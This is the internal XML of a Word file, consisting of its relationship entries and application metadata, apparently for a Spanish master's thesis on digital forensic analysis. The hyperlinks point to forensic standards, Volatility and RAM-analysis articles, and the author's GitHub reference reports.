Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bs.jckcy3j43batzml8vbw25u1y5zm1anatoly5676anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.grupoacms.com/consultora/norma-une-significado" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/011-informe-invalid-user-login.txt" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/spreadsheets/d/16JGkkrY4fiPN32RAfdpVuLJBZrnewscpmuTelbe3X_o/edit" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bwlddhjadekqa7qcrz3rsasoqxufzp1anatoly5676anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/006-UNE-71505-2013.pdf" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/C%C3%B3mputo_forense" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/002-PROPUESTA-TFM-EXCEL.pdf" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=dCU6kIh0qSI" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId234"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hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:fanatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://openaccess.uoc.edu/bitstream/10609/39681/6/cgervillarTFM1214memoria.pdf" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hotfixed42.rssing.com/chan-32986353/article3.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test12312321@mailinator.com" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xn--elespaoldigital-3qb.com/el-metodo-reagan/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=dCU6kIh0qSI" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:pafzzj0anatoly12312anatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hpxecjqa@grr.la" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/007-METODOLOG&#205;A-PARA-UN-AN&#193;LISIS-FORENSE.pdf" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bytelearning.blogspot.com/2017/02/memoria-ram-linux-fuente-informacion.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://18.195.165.56" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amnafzar.net/files/1/ISO%2027000/ISO%20IEC%2027037-2012.pdf" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId12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hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.guerrillamail.com/" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bs.jckcy3j43batzml8vbw25u1y5zm1anatoly5676anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:pafzzj0anatoly12312anatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andreafortuna.org/2019/08/22/how-to-generate-a-volatility-profile-for-a-linux-system/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/003-ISOIEC-27037-2012.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hpxecjqa@grr.la" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://18.195.165.56" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test12312321@mailinator.com" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/004-IMPLEMENTACION-HERRAMIENTAS-PARA-LA-EXTRACCION-DE-EVIDENCIA-DIGITAL.pdf" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/009-informe-dmesg.tx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19C4B5-D8E8-44F1-980E-BE0E03A21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13966</TotalTime>
  <Pages>1</Pages>
  <Words>56520</Words>
  <Characters>310864</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2590</Lines>
  <Paragraphs>733</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Título</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Títol</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="3" baseType="lpstr">
      <vt:lpstr/>
      <vt:lpstr>Treball Final (Plantilla)</vt:lpstr>
      <vt:lpstr>Treball Final (Plantilla)</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>366651</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="156" baseType="variant">
      <vt:variant>
        <vt:i4>1835064</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc112788354</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>119</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638876</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>113</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638875</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>107</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638874</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>101</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638873</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>95</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638872</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>89</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638871</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703996</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>83</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
